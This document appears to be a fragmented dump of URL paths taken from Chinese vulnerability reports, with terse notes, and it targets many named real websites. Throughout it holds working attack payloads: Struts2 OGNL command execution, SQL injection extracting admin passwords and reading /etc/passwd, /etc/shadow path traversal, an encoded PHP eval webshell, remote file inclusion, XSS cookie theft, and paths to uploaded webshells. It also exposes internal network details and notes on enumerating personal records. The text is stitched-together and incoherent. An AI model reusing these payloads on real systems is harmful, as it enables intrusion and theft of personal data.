/login.action?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/usr/local/resin/doc/mail_u/WEB-INF/classes/struts.xml%22)) /realty/house!detail.action?id=4028e44e21ceb7a80121ceb854710061&comment=comment /Member/SetPasswordProtectionResult.do /Member/FindPasswordOK.jsp?mid=200 /apps/actwrite/index.php?s=/Index/content/id/34256 /apps/actwrite/index.php?s=/Index/content/id/34256 /apps/actwrite/index.php?s=/Index/content/id/-34256 /bugs/wooyun-2010-021189 /index.php?m=ask&c=team&a=team_detail&belong=team&tid=39 /index.php?m=ask&c=team&a=quit_team&tid=42(tid改成任意你想解散团队的tid即可) /chromeplus/ /cgi-bin/singlesend?t=ajax-response&lang=zh_CN&type=1&content=1111111111&error=false&ajax=1&tofakeid=14****3660 /cgi-bin/contactmanagepage?t=wxm-friend&lang=zh_CN&pagesize=10&pageidx=0&type=0&groupid=0 /index.php?m=ask&c=index&a=init&belong=index /index.php?m=ask&c=index&a=delete&dosubmit=1&aid%5B%5D=217 /vedioinfo.php?id=405 /vedioinfo.php?id=405'即可暴路径 / /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /resin-admin/j_security_check?j_uri=status.php / /index!logon.action qiyi.com/520184.zmq qiyi.com/MAkai0313 qiyi.com/Hdhd@123 qiyi.com/zhiban /iwc_static/layout/login.html / /p/daily/content/index/zqshSDyvR/65 /YuShouZheng/SellView.ASP?SellID=2133 /YuShouZheng/SellView.ASP?x=%00&SellID=2133 www.wsgsav.com /admn/ly.asp /admn/wc.asp /bbs /bbs/view_topic.php?tid=11378 /cgi-bin/common/cgi_load_flash?uin=%s&fid=%s /bbs/ js代码 alert(document.cookie) /xxgl/hdpt_view.jsp?xh=43 /xxgl/blzn_view.jsp?xh=164 /reg/xgmm.jsp?zcid=27 /xxgl/zcfg_view.jsp?xh=39 /reg/jz_xx.jsp?zcid=5981 /reg/msg.jsp?zcid=5981&msg=4 /ywbl/1-2.jsp /ywbl/1-3.jsp /download/xz_download.jsp?filename=xz_download.jsp(文件名,按自己需求修改) /reg/jdc_xx.jsp?zcid=5981(ZCID参数可从27-12399进行遍历,下同,共有1万多人身份证、联系方式、驾驶证等信息,任意用户登录后可修改密码) /reg/jz_xx.jsp?zcid=5981 /reg/msg.jsp?zcid=5981&msg=4 /reg/xgmm.jsp?zcid=27(仅遍历) csjjcgs.cn“ /htgl/login.jsp schemas-microsoft-com:vml url(#default#vml);position:absolute;width:100%;height:100% /mail.vml#xss /login.php /newindex.php?url=ychjcontent&id=51%20and%201=2%20union%20select%201,2,concat%28unhex%28hex%28fd_user_acount%29%29,0x3a3a3a,unhex%28hex%28fd_user_pas%29%29%29,4,5,6,7,8,9,10,11,12,13%20from%20tb_user%20limit%201 /pic/zt/hysy/ / /login.jsp /index.php /Publicity/index.html /News/NewsDetail.aspx?newsid=4 /User/UserPurviewList.aspx?deptid=********&deptlevel=1&txtInnerUserID=18 /upfile/0710/admin.aspx /showNews!show.action?id=second17089 /henancms/jeecms/ArtiSearch.do?count=10&searchKey=asd / / / /\';assert(chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(71).chr(69).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41));// / /';assert(chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(71).chr(69).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41));// url(test.sct) /classic/base_download_att.php?file_name=test.sct&file_size=367.5&mid=02BB29DB41F5347D476D455DC6C699DEE600000000000002&content_type=application/octet-stream&attinfo=4-1533-2023-base64&fid=out /Public/view-news.htm?catid=1%27%22&id=30& /FCKeditor/editor/filemanager/upload/simpleuploader?Type=Image /xsxx/photo.aspx?id=20120101111 //bbdaiyan_info.php?bb_id=34 www.yinzuo100.com /login.jsp  / gov.cn /lUOCMS_UTF8_V2.0.101201/upload/ http://www.a-muma.com/diyps.asp /a-m1.txt /admin/login.php install/ /cutecms_free_v3.5/index.php?staticUrl=[sql /login.action /login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(d))&('\u0023c')(('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(c))&(asdf) /login.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\'')(d))&(h) /index.ph /cangku/login.php /cangku/php.php /w_inbookcase.php?book_id=233580%20and%201=2%20union%20select%201,version(),3%20-- /w_inbookcase.php?book_id=233580%20and%201=2%20union%20select%201,CONCAT(load_file(0x2F6574632F706173737764),load_file(0x2F7573722F6C6F63616C2F706870352F6C69622F7068702E696E69)),3%20-- /xhstamp/getStampsByName.html /.svn/entries /interfaceTest.php /sys/feedback.php /uc_server.tar.gz /index.jhtml /adduser.jsp /manager/login /phpshe_v1.1/index.php?mod=../../robots.txt%00 /phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001 /1/35/s5?vid=330 /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /espcms_utf8_5.6.13.03.14_b/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00 / /web/search.html?keyword=(此处构造恶意代码) search.daquan.xunlei.com/web/search.html?keyword= /?u=99e75d /7dUSI bdmobile.android.app/databases/webview.db /member/getverificationcode.html /oa/uploadfile/img/42f359171123244311-7ff9.gif /channel/doChannelList.action存在Structs2漏洞可以直接传木马。。。 /default.aspx / /CMOC/enterprise/CRM_Staff_List.aspx /InDigLib http://jifen.womai.com/share.php?activity=6&code=13055364&mid=0 /OurHome/modules/core/Login.jsp?code=lvNo9vqC409wiDMfqSvy&successUrl=null www.baidu.com /UserControls/morenewlist.aspx?type=0 /login.aspx /bugs/wooyun-2013-021423 / /api/epg/now/?c=cctv8&cb=displayepg /shop_itemDetails.htm?item_id=1 /20110507/4375879_130153299169_2.jpg mail gw或者inurl:gate.等都可以搜索到。 mail edu.cn和inurl:mail gov.cn也可以找到目标。。。 /admin/还是可以很轻松判断是不是eYou。 /admin/ /admin/或http://www.target.com:8080/gw/admin/ admin@(eyou) eyou_admin /grad/admin/domain_logo.php这里,这个文件直接读取Cookie("cookie"),然后就带入popen了,没任何过滤,多好啊。 /grad/admin/domain_logo.php /grad/admin/test.txt /wctju3/list.aspx?lb=fw /2611294/ /task/2013-04/09/pub/5164188da1167.rar /getalbumprofile.do?owner=UserID /photo/UserID/latest/photo-PhotoID /admin/left.aspx /bibei/wap/soft?productid=34734&from=%E9%A6%96%E9%A1%B5&sid=55b3bc12d7&user_phone=nokia.5800&ad_mark=%E9%A6%96%E9%A1%B5%E8%BD%AF%E4%BB%B6&tpl=999999.9%27+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C%28SELECT+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+FROM+%60information_schema%60.tables+WHERE+table_schema%3D0x657373656E7469616C5F736F6674%29%2C0x31303235343830303536%2C0x31303235343830303536--+a Channel.aspx/NewImpeachReport,在举报的附加说明处存在存储型XSS / /know/askquestion/?word= / /anti_theft/login.jsp /v3/safeup_lib.cab /XXXXX.cab /exhibitors-system/index.php?p=admin /exhibitors-system/index.php?company_id=149 /content/3217 /index.php?app=areafood&mod=Index&act=detail&id=640&i=34062&l=2425 /index.php?app=home&mod=Public&act=isEmailAvailable /en/%E4%BD%BF%E7%94%A8Authorization_Code%E8%8E%B7%E5%8F%96Access_Token /s/blog_56b798f801018jyb.html /newmoreJcdx.jsp?type=35注射点 /campus/preview?p_resumeId=7178&p_userId=7179 /campus/preview?p_resumeId=这里的编号&p_userId=这里的编号 /interface/cc.php?app_id=100&ids=100512522%3B100512280%3B100511966%3B100511203%3B100511519%3B100511441%3B100512490%3B100512606%3B100512503%3B100512393%3B100512322%3B100512493%3B100512309%3B100512292%3B100512277%3B100512424%3B100512351%3B100512219%3B100512130%3B100512604%3B100512561%3B100512386%3B100512362%3B100512610%3B100512545%3B100512459%3B100512405'&callback=jsonp1365649637356 /interface/cc.php?app_id=2&ids=55266%3B55264%3B55230%3B55250%3B55248%3B55247'&callback=jsonp1365649637357 /img/shouye_b5486898c692066bd2cbaeda86d74448.gif /app/enter?appid=280383 /search.php?key=%2522%253E%253Cscript%253Ealert%2811%29%253C%2Fscript%253E&format= /search.php?key=111&format= /12jup/vote/pl.asp?id=188 www.ctvonline.cn/news.php?act=downloadpdf&mid= www.ctvonline.cn/news.php?act=downloadpdf&mid=-1%20or%2076%20%3d%2074 / /admin/ /_console/ /_console/left.asp /_console/newflight/OrderPrintTicket.asp /_console/PwdUpdate.asp /background/index.asp /user/resetPwd/yyyy?pwdResetId=4&email=xxxxxxxxxxxxxx /front/article/article.action?id=3085 www.airchina.com.cn /esf_shop.php?uid=904 /tutor/login.action?_post_userType=1&userid=88952634&password=88952634&vcode=88952634 /VCHWeb/voucherForMem/queryNotuseVoucherNew.action?isweb=t&membercd=660010553848 /test.txt /user/userinfoLogin.action /apps/vshare/share.php?title=%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D_%E4%B8%AD%E5%9B%BD%E7%A7%BB%E5%8A%A8%E9%80%9A%E4%BF%A1&url=http%3A%2F%2Fwww.10086.cn%2Fonlineservice%2Fcom_ask%2FSaS_H_F_Mobile%2F201209%2Ft20120908_38479.htm&app_key=809d94dc9e84f39e3646ee5c72f473f4 /apps/vshare/share.php?title=%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D_%E4%B8%AD%E5%9B%BD%E7%A7%BB%E5%8A%A8%E9%80%9A%E4%BF%A1&url=http%3A%2F%2Fwww.10086.cn%2Fonlineservice%2Fcom_ask%2FSaS_H_F_Mobile%2F201209%2Ft20120908_38479.htm&&app_key=809d94dc9e84f39e3646ee5c72f473f4'%20and%201=1%20union%20select%20999998,999997,999996,999995%23 /,但是无法访问,可能限制网段,猜测它的原因是http://admin.talk.shequ.10086.cn/这类不存在的域名运营商是提示不存在的,而administrator无法访问。 /bless_json.php?timestamp_id=36g9vk6wk9&num=1000 /crm/Message/ExMailSend.asp?UID=&AccountID=&MailID=1&IsPrivate=1&OperateType=ReSend&TimeID=0.13946238309452646进入编写邮件界面,你可以上传、可以XSS,当然权限绕过不久就就发生在这里,很多页面都有权限绕过: /* /* /* / /priceCompete/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder= /priceCompete/ /rwpd/rwsun/rwSunPhoto!showPhotoReviewList.action?id=7045 /F199947.html /User/RemindMyPwd.asp /detail/7359838 /detail/4843254 /root/m15/?query=';%0aalert(1)// /protect/setQuestions 20.0 /fa/slide_3_41261_19668.html /cmnt/submit?channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg /UserLogin.aspx /webgps/ /?i=3422 /jsp/691error/queryTypes.jsp”(电信可以随时劫持任何通讯)。 /jsp/691error/queryTypes.jsp /jsp/691error/queryTypes.jsp /freeAccountLogin?ip=113.***.***.192 /jsp/691error/queryTypes.jsp /service/error/queryTypes.action?loginName=02900******&latnId=290) function(data) /jsp/691error/qryowemoney.jsp /?i=3422 /wwht/extfiledown?wjlj=1346057307119.doc&path=file /wwht/userfiles/file/1346057307119.doc / /fckeditor/editor/filemanager/upload/php/upload.php?Type=Media /ucenter /dang/comment.php3?id=176 / /newfile/inc/relation.asp?news_id=834&about=99999999 /news_view.php?newsid=81 /plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60 /plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60 v2ex.com/setting /backup/backup.rar /1ndex.html /dev.php /common/lib/FCKeditor/editor/fckeditor.html /data/mysql_error_trace.inc /cgi-bin/php-cgi/html/svpnphp/_inc/commondef.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2F(以文本形式存在的php命令) /cgi-bin/php-cgi/html/211.txt / /xhsy/cont.aspx?id=3185 /hldr/admin/ /kn2013/admin/ /xhsy/admin/ /找些偏门的代码测试。 alert(1) /里,还是有不少可以使用的代码。譬如: /default.aspx?mainUrl=http%3a%2f%2fxssin**e%2fauth.php%3fid%3d2407 /reset_password.html?username=用户名&code=一串貌似是md5的加密字符 /data/logo/,访问发现可以遍历目录文件,上传的shell文件程序会自动把.jpg去掉改名成为logo.php,直接访问shell可对服务器进行操作,当前用户权限可以直接浏览服务器其他网站目录,造成服务器其他网站沦陷。 /dede//plus/search.php?keyword=as&typeArr[111%3D@`\ /organ/orgquerys.jsp?type=R /blog/article/190.html /index.php?plugins&q=user&page=0 /index.php?plugins&q=user&page=0 /V2Conf/jsp/user/loginAction.do /album/album/search.html /album/album/toEdit.html?album.id=77696&channelId=30©right=-1&page=1&type=-1 /tvpcms/show.html?customerParam=&page=1&sourceId=0&status=-1&tpa= /queryhqChart.html?price=8.68&carlibid=269276&localid=1&madeyear=2008 / /Uploads/1116751/photos/516ba0c351396.php /upload/common/2071894144/201304/201304142354597740.jpg /upload/common/2071894144/201304/201304142357212896.asp /news.php?id=290 /news_in.aspx?id=951 /mainPage/KcNew.aspx?course_id=111 /member.aspx?action=getpassword&uid=自己的uid&id=6位数字组合的随机码 /web/article!list.action?id=3 / / /default_bak.asp /JMWebLucene /JMWebLucene/upload/disk/%E8%A5%BF%E5%AE%89%E7%85%A4%E4%B8%9A/%E4%B8%80%E5%8C%BA/JspSpy.jsp /sso/ /personal/updateEmailOfPage.jsps?updateEmail=123@126.com register.zhenai.com/register/upLoadUserPhotoPre.jsps%3FregType%3Dphone%26towhere%3Dhttp%253A%252F%252Fprofile.zhenai.com%252Fpersonal%252FmymainPage.jsps%3Fr%3D0.9503279209305837 / /yysjs.php?sid=42 /Fbii/sixFlyApplyAction_init.do /admin/baixiangshishi/ssnrform.jsp?mode=modify&ssnr_id=4034&lb=2107&page=1直接拥有管理权限,你懂得~ sale/d-*****.html(关键字可以换其他的,搜索引擎可以用谷歌) /common/lib/FCKeditor/editor/fckeditor.html txt /svn/ https://github.com/zcxey2911/newyouku/blob/master/%E8%AE%B0%E4%BA%8B.txt /CFIDE\componentutils\cfcexplorer.cfc /CFIDE\componentutils\cfcexplorer.cfc /bbs/topic/46 /bbs /addr/modaddr?id=90000720000 /?uid=355098 //easWebClient/ /nap/ //client/ /en/products/kis/ /login?service=http%3A%2F%2Fkdeas.kingdee.com%3A7888%2Feasportal%2F /down /easfiles/easdoc/files/ /sitemap.xml / /weibo/aa%253Ciframe%252Fonload%253Dalert(%252Fxss%252F)%253E&Refer=STopic_box /zj/zjkp_disp.jsp?yhid=1 /team/matchrank.php?page=2 /Video/Detail/13430 /Video/Detail/13431 /Video/Detail/13433 /serviceAction!toComm /admin/member/commmgt.jsp /wiki/wiki_detail.php?id=xxx,wiki_datail.php函数存在问题,通杀全国酷房站点; /wiki/wiki_detail.php?id=126 /wiki/wiki_detail.php?id=74 /wiki/wiki_detail.php?id=92 / /index.html /index.html /user_manage.php /user_manage.php /project_info.php?id=447 /project_info.php?id=447%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,database(),8,9,0,1,2,3,4,5,6/*xx 73d465767e39eb77:localhost 19012f603a01ad5e:% 71a4653336b50cfd:% /ct/ /Pages/PrintPage.aspx?ClassName=ReceiveidPrint&ObjID=1,2,3,4,5,6,7,8,9,10,11, /default/listen?nick=wooyun2 /default/listen?nick=wooyun2 /itemlist/default.htm /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /rest/2.0/services/cloud_dl /netdisk/BaiduYun_3.6.0.exe /netdisk/BaiduYun_3.6.0.exe /BaiduYun_3.6.0.exe /tbIndexAdvertisement!gotoIndex.action /sunflower/auth/login.action /zhuxian/zhuxianwishingtree/index.action /dpool/music/song_list.php?pos=82&sid=1 /p/publish.php /bxlz/admin/Detail.aspx?actorid=136 / /***** / / /home/stat /wow/cn/itemsets.html?su=496509 flvStart /all/index.php /weibo/Chu_%25E6%2598%25B5%25E7%25A7%25B0%25E9%2595%25BF%25E9%2595%25BF%25E9%2595%25BF&xsort=social&Refer=STopic_box /Search.Aspx?id=59&Key=1注入,sa权限 /2597/ www.xxxxx.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2 /www.rar /ladder/bridge/bridge_teamlist.asp?tid=1 /ladder/bridge/bridge_teamlist.asp?tid=1 /ladder/bridge_fee/gamelist_team.asp?tid=75 /userinfo/userinfo.aspx?username= /graphgamepassport!login.do?game=klsg&parent="/ /msg/bbs_msg.asp?reg=1&msgID=50002&Subject_ID=615&BBs_ID=""/ /templates/index/iframe_query.jsp?src=../../../../../../ flash小游戏 /game/FPBCHMON?fromwhere=dt%22%0aalert(1)// /list.asp?base_clsid=41 /news.aspx?ncid=1 /adminLog/detail?id=44 /user/repassword/userid/60xxx1366333027 /member/changepass/userid/注册用户ID1366281757 /files/121355/sapconfigservlet-exec.rb.txt /wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf /admin/AdminLoginForm.aspx?url=main.aspx id:13823787846 /search.php?pickout=1&cat_id=4&attr%5B5%5D=PU /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F../../../../../../ /zhaopin1.asp?area_id=wz /7sLky /?ali_trackid=2:mm_33706838_0_0:1366369169_3k8_1856758308 /?ali_trackid=2:mm_33706838_0_0:1366369169_3k8_1856758308 /sys/ctrls/WebEditor/editor.aspx?contentId=14&tabdef=&inapproot=0&folder=&dir= /icdpimage/XXXXX.aspx / /app/appOut.action /bugs/wooyun-2013-018437几乎相同,高校版并未修复。 /edu/web/product/product_info.php?columnId=149 /admin,发现跳到http://mi.cztv.com/admin/login/index /star?user_id=62、分别在参数值后'、-1、-0确定存在注入 php:318 /plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a weibo.com /?tf=5_009&gsid=[这里填搜到的gsid /newweb/secondpage.jsp?id=1146 /admin_index.asp /111.rar /silent.php /Admin_Sadofot.asp /image/oy.asp /editor/DownLoadegw.aspx /images/maing.asp /images/me.asp /login.asp /Zongg/addadm.asp /Admin/left.aspx /Admin/login.aspx /admin_index.asp /upload/upload.asp /upload/uploadFile/2013420183255.asp /webzine_0x05/走向本地的邪恶之路 //127.0.0.1/ /outdoor/ad/adAct.do?adRegionCode=321300&flag=1&method=viewLED&adSortId=2&sortType=LED /v3/gw?method=item.info.get&appKey=6fd4fe7743861fad&format=json&itemCodes=145934359 /test.php /phpinfo.php /manager/manager.asp /manager/dingyi_user.asp?action=ingonggao&pos=3%E2%80%98 /admin/Login.aspx?backUrl=http%3a%2f%2fedit.pcpop.com%2fpublish%2fart_add.aspx /pcpopkeyword/ /pcpopkeyword/20120515/ /pcpopkeyword/include/ashx/hd_lst.ashx?a=maylikeKeyword&ID=99 hezi.pcpop.com/.svn/entries /mysns/trunk/code/uc /token.ashx /login.ashx /login.ashx /cookie.ashx /admin/Default.html app.culture.ifeng.com /news/plus/search.php /index.action, www.ofweek.com主站如图: /sgs/2.0/updateios.asp?ID=20002&v=2.2.1 /include/ /include/config.inc /fb_detail.php?id=87 /admin/index.php /ask/search-answer/t/0?k=1 /admin/list.php /article.php?ID=948存在注入 / //plus/search.php?keyword=as&typeArr[111%3D@`\ /ACTIONSHOWNEWS.APPPROCESS?mode=2&NewsID=341 /View.aspx?nid=8276 /poll.php?t_id=16437&succpage=http://publish.games.sina.com.cn/08/31/831/sign_1.html&failpage=http://publish.games.sina.com.cn/02/34/234/suc_1.html&&p_id=831 /export/spreadimg/id/315 /Index/ /webzine_0x05/走向本地的邪恶之路 //c:/ //c:/ //c:/ www.guidgenerator.com //c:/ /index.php?do=api&id={projectId}&location="+document.getElementById(1).contentWindow.document.getElementsByClassName('icon-folder')[0].getAttribute('title') /marry/marryadmin/web/store.php?method=getstoredetail&id=33 /log/download.php?type=filedown&file=Li4vY29uZmlnL2FkZF91c2VyX2RlbW8uY3N2&filename=add_user_demo.csv /log/download.php?type=filedown&file=../config/add_user_demo.csv&filename=add_user_demo.csv /log/download.php?type=filedown&file=Li4vbG9nL2Rvd25sb2FkLnBocA==&filename=download.php /register/CheckCode?invcode=工作专用 / /my/and.php /ue/vote/self/82/sta.action /irun/QandA/index.php?my=1 /PDA/ieIndex.jsp /zecmd/zecmd.jsp /ajax/vrzcode.php /irun/spot/runmap_detail.php?runid=221 xsser.me/4310VB //plus/search.php?keyword=as&typeArr[111%3D@`\ /data/mysqli_error_trace.inc //mynb/login.php?gotopage=%2F%2Fmynb%2Fcatalog_main.php /mshare /mshare /pages/pages.aspx?id=119&page=20 /content.php?ID=230存在注入 /vms/stage/vote/voteAction!moreComment.action /unify/jsp/myclient/prelist.action /eap /ucenter/user/regist!registUserInput.action Ethernet B8:95:9D 192.168.1.13 192.168.1.255 255.255.255.0 feb8:959d/64 Link MTU:1500 packets:1367574738 packets:811675317 txqueuelen:1000 bytes:202566496226 bytes:187154200360 Interrupt:169 f8000000-f8012100 Ethernet B8:95:9F 10.10.10.13 10.10.10.255 255.255.255.0 feb8:959f/64 Link MTU:1500 packets:554395930 packets:182724699 txqueuelen:1000 bytes:162249198852 bytes:20384776529 Interrupt:169 f4000000-f4012100 Local 127.0.0.1 255.0.0.0 Host MTU:16436 packets:3750930 packets:3750930 bytes:334641604 bytes:334641604 ucweb Local 192.168.1.217 255.255.255.255 MTU:16436 Local 192.168.1.218 255.255.255.255 MTU:16436 lo:8769 Local 192.168.1.219 255.255.255.255 MTU:16436 mysql://master.ucenter.db:3306/ucenter?useUnicode=true&characterEncoding=UTF-8 mysql://slave.ucenter.db:3306/ucenter?useUnicode=true&characterEncoding=UTF-8 mysql://localhost:3306/teacherclubauthority?useUnicode=true&characterEncoding=UTF-8 mysql://10.10.10.110:3306/dtsauthority?useUnicode=true&SelectMethod=Cursor&characterEncoding=UTF-8 mysql://db.dts.host:3306/dtsauthority?useUnicode=true&SelectMethod=Cursor&characterEncoding=UTF-8 Ethernet F6:4A 192.168.1.81 192.168.1.255 255.255.255.0 f64a/64 Link MTU:1500 packets:59064843065 errors:35555 dropped:1348 frame:29361 packets:84287274407 txqueuelen:1000 bytes:17203587269987 bytes:79208430866539 fc400000-fc420000 Ethernet F6:4B 10.10.10.81 10.10.10.255 255.255.255.0 f64b/64 Link MTU:1500 packets:38447892281 packets:39092771155 txqueuelen:1000 bytes:28023906757374 bytes:8813716604203 fc500000-fc520000 Local 127.0.0.1 255.0.0.0 Host MTU:16436 packets:14353954794 packets:14353954794 bytes:83788103836248 bytes:83788103836248 Local 192.168.1.3 255.255.255.255 MTU:16436 /creditcard/view/vCardinfo.php?id=703 /urlth.php /?s=book_jishu&a=update&book_id=19999%¶m=read_num&t=051763dbb0652e system_r:unconfined_t:SystemLow-SystemHigh /guestbook/v3/index.asp?m_id=20110822 /usermanage/forgotten /usermanage/newpassword/email/{Base64Encode(xx@xx.com) /?p=189 /reg/trip1 /themes/zqzy/linux.php /shop/cart_item!list.action,该路径存在struts2漏洞,使用struts2终极漏洞利用工具,可以在其WEB服务器上传任意文件,远程执行任意命令,非常危险。 /admin/ xcar.com.cn php /xbackend1/login/ /home.action /plus/search.php?keyword=as&typeArr[111%3D@`\ /jynx /profile.html /backoffice/ /install/ install/install.php index.html history.go(-1) history.go(-1) QQ:848769359 /[/url history.go(-1) history.go(-1) /ipms/ /ajax/getVoteNums.php?ids=1 /codeDetail.php?code=136987666&fr=0&city=chengdu&vt=3 /ajax/aj_sendCode.php?code=136987666 /10144/26371.shtml /login.txt /ELSNetAccept/chose/showitem_event.action /film_detail.php?cinema_id=1&cfilm_id=939',即可以确认漏洞。 test'+#13#10+'pass:gaimima','提示!',0 gov.cn /g/show.asp?site=cdbs&channel=homepage&category=homepage&type=column470x65&location=1 /g/out.asp?AID=112&FlightID=67&navId=141&page_id=7&Redirect=http://t.cdbs.com.cn/index.php?m=live&Values=1115 www.htinns.com /try/myTry.aspx?sn_uname=***(可替换任意用户或者id) /try/myTry.aspx?sn_uname=xxx111 /admin/login /blog.php?c=5 /zhuanti/more.php?cid=2884&p=1 /click.php?id=4 /download/search.php?year=0&type=2826&dl_keyword= /a/?aid=150630 /space.php?uid=629&t=5 /data_json.php?cid=2784&num= /?type=2832 /zhuanti/2012amie/show.php?id=192 /SimpleHome.aspx /syslogin.aspx / /domain-admin/vdns.net?IDDomain=11639890 /wcm/xwcmhf/hfliuyan_content.jsp?liuyanid=26009 /main/sale/bestsellers1.asp?tid=59-16-2%27%20and%200%3C%3E%28select%20@@version%29-- www.china-pub.com/edition06/dl.asp?fjm=no&scriptname= /bussiness/page/new/index.html / /SlaughterSain /topicList.html /client/index.action /irun/uc/space.php?uid=1870758683 /irun/uc/attent_opt.php?uid=1870758683&do=add /bugs/wooyun-2013-021221 /BlogBoxAction.action这个页面。我们随意发表一篇日志。 /index.php?c=wall&a=topic&ak=801153264&t=test&fk=&fn=ss&rnd=1366774967396 18.0 /espcms/adminsoft/ /adminsoft /v2/?regnotify&email=%22;alert('xss');%3C/script%3E /install/ /index/login?username=ganjiwang%27%20and%201=%271&password=15101088540&logintype=0 /index/login?username=ganjiwang%27%20and%202=%271&password=15101088540&logintype=0 /index/login?username=ganjiwang%27%20and%20sleep(9)=%271&password=15101088540&logintype=0 /UserSmsInfo.aspx?ID=2169100 www.cosco.com /cn/search/index.jsp?key=mm zikao.hneao.cn/net /self-study/generate?exporttype=html&ks_zkz=911107300146(考籍号可遍历)&pages=0&reportname=ExamineeRepPrint&source_type=0 /self-study/ExamineeInfo.do?examinee_num=910803303608(考籍号可遍历)&method=exam /net/SchemeSpecialty.do?method=showUpdate&specialty_isn=558(可遍历) /net/net/signupSiteAction.do?method=querySpecialty&site_code=032301(考点代码) /net/pages/net/found_bkd_list.jsp?site_code=032301(考点代码) /net/pages/net/found_bkd.jsp zikao.hneao.cn /bbs /bbs/forum/forumdisplay?fid=1409024151041055 /bbs/post/show/?pid=5733484143661048390 /login/try?code=tfjt /zabbix/ /irun/uc/space.php?uid=1870758683 /irun/uc/space.php?uid=1870758683 /wp/wp-includes/js/plupload/plupload.flash.swf?id=0\%22%29%29}catch%28e%29{if%28!window.x%29{window.x=1;document.write /1.js /wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve /cookie.php?c='+a /online/HotelInfo.aspx?Hotelid=00508069#”,预感到有些不妙,点击进入,发现直接进入后台,如图 /login/index.jsp /cgi-bin/result?p=a&r=content /manage/content/docmanage/previewImg1.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow%00.jpg /manage/content/docmanage/download.jsp?filePath=/../..//../..//../..//../..//../..//etc/shadow /newmondeo/api/poster_send.php?content=微博内容 /admin/RegUploadFile.aspx?ParentTextName=TX_qsUploadPicUrl&ParentDivName=DIV_qsUploadedPic&ParentSizeName=TX_qsUploadPicSize&ParentTypeName=TX_qsUploadPicType&TA_Question=TA_Question199240&lang=chs /reg/forgetpass/?uid=自己的id&hash=WWZSR+1Y7d+Gk3f8IzfdJqCMquu5CrStbQ== /reg/sendPass/?userName=0&auth_code=csn6&user_id=286505中得user_id=286505 /index.php?cl=freeaction&at=index&from=md&uid=14611《科学小超人》万人体验行动,填写信息即可免费申领物品!在填表处,提供的手机需要进行手机验证,但可以绕过! / /bugs/wooyun-2010-022384 /businesshall/Captchar!getCaptchar.action /edi/user!login.action /app/create /loreal/s2.php?id=2 /bugs/wooyun-2013-022617这个,遂有了好奇心(ps:好奇心害死人啊)便百度搜索,被找到了,看了弱口令 /user/mod_mblog.php t.qq.com/CaoYebo1999 /manager/login.aspx /upfile/201304271609503754158.asp document.cookie /developer/is_login /Cart/Register.do /Cart/Register.do?parendId=0&Email=sex%2540126.com&loginId=foxxx&password=sexsex11&password2=sexsex11&invitationCode=&know_womai=%25E6%259C%258B%25E5%258F%258B%25E4%25BB%258B%25E7%25BB%258D&know_womai=%25E6%2590%259C%25E7%25B4%25A2%25E5%25BC%2595%25E6%2593%258E&know_womai=%25E4%25BF%2583%25E9%2594%2580%25E5%258D%2595&know_womai=%25E8%25AE%25BA%25E5%259D%259B&know_womai=%25E6%2596%25B0%25E9%2597%25BB&know_womai=%25E5%2585%25B6%25E4%25BB%2596&validateCode=au6q&=on&providerName=userRegistExtentionAttribute&memberGroup=1&parentId=0&mid=0&usertype=1&returnUrl=&callback=jsonp1367119154807&_=1367119289017 20.0 /swf/duanzi.swf /641010080/weibo/friends/add?g_tk=1329581857 /360.exe /360.exe /360.exe /share/link?shareid=450929&uk=3961677986 20.0 /apilibproxy.html /641010080/weibo/t/re_add /641010080/weibo/t/re_add /logs/ / / /index1.php / 